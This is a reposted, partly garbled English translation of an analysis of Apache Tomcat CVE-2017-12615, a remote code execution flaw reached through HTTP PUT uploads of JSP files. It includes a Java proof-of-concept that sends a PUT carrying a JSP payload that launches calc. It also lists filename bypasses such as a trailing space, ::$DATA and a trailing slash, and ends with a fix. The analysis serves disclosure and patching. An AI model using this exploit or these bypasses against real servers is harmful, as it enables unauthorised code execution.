Apache Tomcat cve-2017-12615 Remote Code Execution Vulnerability Analysis

Source: Internet
Author: User
Tags apache tomcat cve

September 19, 2017, Apache Tomcat officially released two serious security vulnerabilities, in which cve-2017-12615 is a remote code execution vulnerability, uploading a malicious JSP file to the server through a put request, and then executing arbitrary code on the server through a JSP file. And the latest patch does not completely fix the vulnerability. Beijing will continue to pay attention to this vulnerability, and the first time for you to update the relevant vulnerability information.

Vulnerability number

cve-2017-12615

Vulnerability Name

Apache Tomcat Remote Code Execution vulnerability

Vulnerability Rating

Serious

Impact Range

Apache Tomcat 7.0.0-7.0.79

Vulnerability Analysis 1. Creating a debugging environment

Download Tomcat v7.0.79 source code, Http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.79/src/apache-tomcat-7.0.79-src.zip
After unpacking, create the Pom.xml file in the Jiebaugen directory and add the following:

<?xml version= "1.0" encoding= "UTF-8"?>
<!--suppress All--
<project xmlns= "http://maven.apache.org/POM/4.0.0"
Xmlns:xsi= "Http://www.w3.org/2001/XMLSchema-instance"
xsi:schemalocation= "http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd" >
<modelVersion>4.0.0</modelVersion>
<groupId>org.apache.tomcat</groupId>
<artifactId>Tomcat7.0.79</artifactId>
<name>tomcat7.0.79 src</name>
<version>7.0.79</version>
...........
</project>

To modify Conf/web.xml, add the following:

<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

Idea Open Pom.xml file
The startup items are configured as follows

2. Do not add content after JSP

Package com.zxsoft;
Import Java.io.File;
Import Java.io.FileInputStream;
Import java.io.IOException;
Import Java.io.InputStream;
Import Java.io.OutputStream;
Import java.net.InetAddress;
Import Java.net.Socket;
Import com.sun.jersey.api.client.Client;
Import Com.sun.jersey.api.client.WebResource;
Import sun.net.www.http.HttpClient;
public class tomcatexp{
public static void Main (string[] args) throws Exception {
Socket s = new socket ("localhost", 8080);
OutputStream out = S.getoutputstream ();
String spayload = "<%process proc = Runtime.getruntime (). EXEC (\" calc\ ");%>";
Payload1
String head = "put/upload/" + "1.jsp" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"
+ "connection:keep-alive\r\n" + "accept:text/html,application/xhtml+xml,application/xml,*/*\r\n"
+ "Accept-encoding:gzip, deflate\r\n" + "accept-language:zh-cn\r\n" + "Content-length:"
+ spayload.length () + "\ r \ n" + "\ r \ n";
Out.write (Head.getbytes ());
Out.write (Spayload.getbytes (), 0, Spayload.length ());
S.close ();
}
}

Unable to create file when entering Jspservlet

3. jsp Add \string head = "put/upload/" + "1.jsp%7c" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Enter Defaultservlet

Judging readonly parameters

Write a file


Prompt exception, syntax error

4. JSP add space after string head = "put/upload/" + "1.jsp%20" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Enter Defaultservlet
File creation succeeded

Add to. (dot) similarly

5. Add after JSP:: $DATA

String head = "put/upload/" + "1.jsp:: $DATA" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"

Enter Defaultservlet
File creation succeeded

6. Add after JSP/

String head = "put/upload/" + "1.jsp/" + "http/1.1\r\n" + "Host:" + "localhost:8080" + "\ r \ n"


Get rid of the last/last successful file creation

7.7.0.81 version

The case of spaces, Canpath and abspath are not the same, return null, bug fix

:: $DATA situation, Canpath is empty, bug fixes


/, the file is still successfully returned, the vulnerability is not fixed

Exploit exploits

Access JSP file, execute code successfully

Fix suggestions

The Conf/web.xml file ReadOnly property value is set to Ture.

Apache Tomcat cve-2017-12615 Remote Code execution Vulnerability Analysis

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.